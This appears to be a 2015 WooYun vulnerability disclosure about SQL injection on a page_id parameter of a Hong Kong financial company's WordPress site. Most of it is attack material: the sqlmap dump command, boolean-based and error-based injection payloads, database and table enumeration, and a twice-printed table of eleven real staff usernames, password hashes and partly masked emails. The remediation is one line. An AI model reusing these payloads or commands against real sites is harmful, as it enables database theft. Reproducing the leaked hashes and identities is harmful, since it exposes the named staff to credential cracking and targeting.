当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0156848

漏洞标题:財華控股有限公司某站存在SQL注入漏洞(用户邮箱及密码泄露)(香港地區)

相关厂商:財華控股有限公司

漏洞作者: 路人甲

提交时间:2015-12-01 11:30

修复时间:2016-01-15 16:40

公开时间:2016-01-15 16:40

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(hkcert香港互联网应急协调中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-12-01: 细节已通知厂商并且等待厂商处理中
2015-12-01: 厂商已经确认,细节仅向厂商公开
2015-12-11: 细节向核心白帽子及相关领域专家公开
2015-12-21: 细节向普通白帽子公开
2015-12-31: 细节向实习白帽子公开
2016-01-15: 细节向公众公开

简要描述:

50大異動股各有故事,為你剖析精彩故事背後的情節。

详细说明:

地址:http://**.**.**.**/?page_id=3572

$ python sqlmap.py -u "http://**.**.**.**/?page_id=3572" -p page_id --technique=BE --random-agent --batch  -D Topic -T wp_users -C user_login,user_pass,user_email --dump


Database: Topic
Table: wp_users
[11 entries]
+------------+------------------------------------+--------------------------+
| user_login | user_pass                          | user_email               |
+------------+------------------------------------+--------------------------+
| eddielai   | $P$B2OqWtmSaKJIcaCPVrUBenCquEstjR0 | eddielai@**.**.**.**    |
| dickleung  | $P$B5Z7ykE171/E4alqaCeiT/HF2mtcmR1 | dickleung@**.**.**.**   |
| victor     | $P$BEK2caFAN2/g/hdExZ8L7icgxtTCCG1 | victorcheng@**.**.**.** |
| gennie     | $P$BGrAOv8qS78JOdNKqUrjAX8zgO84/O/ | gennielam@**.**.**.**   |
| fancalee   | $P$BGsvcxcwAZFtsEmjm6TUzCT3G.eSHy. | francalee@**.**.**.**   |
| carol      | $P$BgUkEJ6JKYYc9RhHYrASNKDmXZWln8. | carolchan@**.**.**.**   |
| Wan        | $P$BiXSUlA3jg.1sulSLzy4rXHjnaY6Ks/ | wancham@**.**.**.**     |
| fin_dev    | $P$BpHpIlADLDbbte4VEB32UTkdT0R8CP0 | keithsiu@**.**.**.**    |
| Davis      | $P$BR3/SCFpZPAMrrGYahdjLXMCLjoPQh/ | davisho@**.**.**.**     |
| Tony       | $P$BrZQHnmOIzJHeIJ4rtfcoLV8EtNpZA/ | tonyleung@**.**.**.**   |
| pakyeung   | $P$BW4jKPCENNH2YtKqhO.a5phbyPPbCs1 | pakyeung@**.**.**.**    |
+------------+------------------------------------+--------------------------+

漏洞证明:

---
Parameter: page_id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: page_id=3572 AND 4735=4735
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: page_id=3572 AND (SELECT 8111 FROM(SELECT COUNT(*),CONCAT(0x716a6b6a71,(SELECT (ELT(8111=8111,1))),0x716a786b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
---
web server operating system: Linux CentOS 6.5
web application technology: PHP 5.3.3, Apache 2.2.15
back-end DBMS: MySQL 5.0
current user:    'topicadm@%'
current user is DBA:    False
database management system users [1]:
[*] 'topicadm'@'%'
Database: Topic
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| wp_postmeta                           | 4755    |
| wp_posts                              | 3250    |
| wp_term_relationships                 | 1047    |
| wp_usermeta                           | 174     |
| wp_options                            | 139     |
| wp_hdwplayer                          | 92      |
| wp_hdwplayer_videos                   | 83      |
| wp_term_taxonomy                      | 46      |
| wp_terms                              | 46      |
| wp_users                              | 11      |
| wp_Spider_Video_Player_theme          | 7       |
| wp_Spider_Video_Player_tag            | 2       |
| wp_hdwplayer_playlist                 | 1       |
| wp_Spider_Video_Player_player         | 1       |
| wp_Spider_Video_Player_playlist       | 1       |
+---------------------------------------+---------+
Database: information_schema
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| COLUMNS                               | 745     |
| GLOBAL_STATUS                         | 291     |
| SESSION_STATUS                        | 291     |
| GLOBAL_VARIABLES                      | 277     |
| SESSION_VARIABLES                     | 277     |
| COLLATION_CHARACTER_SET_APPLICABILITY | 130     |
| COLLATIONS                            | 129     |
| STATISTICS                            | 99      |
| PARTITIONS                            | 68      |
| TABLES                                | 68      |
| KEY_COLUMN_USAGE                      | 49      |
| TABLE_CONSTRAINTS                     | 45      |
| CHARACTER_SETS                        | 36      |
| SCHEMA_PRIVILEGES                     | 34      |
| PROCESSLIST                           | 13      |
| PLUGINS                               | 7       |
| ENGINES                               | 5       |
| SCHEMATA                              | 3       |
| USER_PRIVILEGES                       | 1       |
+---------------------------------------+---------+
Database: Topic_uat
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| wp_postmeta                           | 3824    |
| wp_posts                              | 2057    |
| wp_term_relationships                 | 682     |
| wp_options                            | 236     |
| wp_usermeta                           | 170     |
| wp_hdwplayer                          | 92      |
| wp_hdwplayer_videos                   | 83      |
| wp_term_taxonomy                      | 44      |
| wp_terms                              | 44      |
| wp_users                              | 11      |
| wp_Spider_Video_Player_theme          | 7       |
| wp_comments                           | 2       |
| wp_Spider_Video_Player_tag            | 2       |
| wp_hdwplayer_playlist                 | 1       |
| wp_Spider_Video_Player_player         | 1       |
| wp_Spider_Video_Player_playlist       | 1       |
+---------------------------------------+---------+
columns LIKE 'pass' were found in the following databases:
Database: Topic
Table: wp_users
[1 column]
+-----------+-------------+
| Column    | Type        |
+-----------+-------------+
| user_pass | varchar(64) |
+-----------+-------------+
Database: Topic
Table: wp_posts
[1 column]
+---------------+-------------+
| Column        | Type        |
+---------------+-------------+
| post_password | varchar(20) |
+---------------+-------------+
Database: Topic_uat
Table: wp_users
[1 column]
+-----------+-------------+
| Column    | Type        |
+-----------+-------------+
| user_pass | varchar(64) |
+-----------+-------------+
Database: Topic_uat
Table: wp_posts
[1 column]
+---------------+-------------+
| Column        | Type        |
+---------------+-------------+
| post_password | varchar(20) |
+---------------+-------------+


Database: Topic
Table: wp_users
[10 columns]
+---------------------+---------------------+
| Column              | Type                |
+---------------------+---------------------+
| display_name        | varchar(250)        |
| ID                  | bigint(20) unsigned |
| user_activation_key | varchar(60)         |
| user_email          | varchar(100)        |
| user_login          | varchar(60)         |
| user_nicename       | varchar(50)         |
| user_pass           | varchar(64)         |
| user_registered     | datetime            |
| user_status         | int(11)             |
| user_url            | varchar(100)        |
+---------------------+---------------------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: page_id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: page_id=3572 AND 4735=4735
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: page_id=3572 AND (SELECT 8111 FROM(SELECT COUNT(*),CONCAT(0x716a6b6a71,(SELECT (ELT(8111=8111,1))),0x716a786b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
---
web server operating system: Linux CentOS 6.5
web application technology: PHP 5.3.3, Apache 2.2.15
back-end DBMS: MySQL 5.0
Database: Topic
Table: wp_users
[11 entries]
+------------+------------------------------------+--------------------------+
| user_login | user_pass                          | user_email               |
+------------+------------------------------------+--------------------------+
| eddielai   | $P$B2OqWtmSaKJIcaCPVrUBenCquEstjR0 | eddielai@**.**.**.**    |
| dickleung  | $P$B5Z7ykE171/E4alqaCeiT/HF2mtcmR1 | dickleung@**.**.**.**   |
| victor     | $P$BEK2caFAN2/g/hdExZ8L7icgxtTCCG1 | victorcheng@**.**.**.** |
| gennie     | $P$BGrAOv8qS78JOdNKqUrjAX8zgO84/O/ | gennielam@**.**.**.**   |
| fancalee   | $P$BGsvcxcwAZFtsEmjm6TUzCT3G.eSHy. | francalee@**.**.**.**   |
| carol      | $P$BgUkEJ6JKYYc9RhHYrASNKDmXZWln8. | carolchan@**.**.**.**   |
| Wan        | $P$BiXSUlA3jg.1sulSLzy4rXHjnaY6Ks/ | wancham@**.**.**.**     |
| fin_dev    | $P$BpHpIlADLDbbte4VEB32UTkdT0R8CP0 | keithsiu@**.**.**.**    |
| Davis      | $P$BR3/SCFpZPAMrrGYahdjLXMCLjoPQh/ | davisho@**.**.**.**     |
| Tony       | $P$BrZQHnmOIzJHeIJ4rtfcoLV8EtNpZA/ | tonyleung@**.**.**.**   |
| pakyeung   | $P$BW4jKPCENNH2YtKqhO.a5phbyPPbCs1 | pakyeung@**.**.**.**    |
+------------+------------------------------------+--------------------------+

修复方案:

上WAF。

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:6

确认时间:2015-12-01 16:38

厂商回复:

Referred to related parties.

最新状态:

暂无

漏洞评价:

评价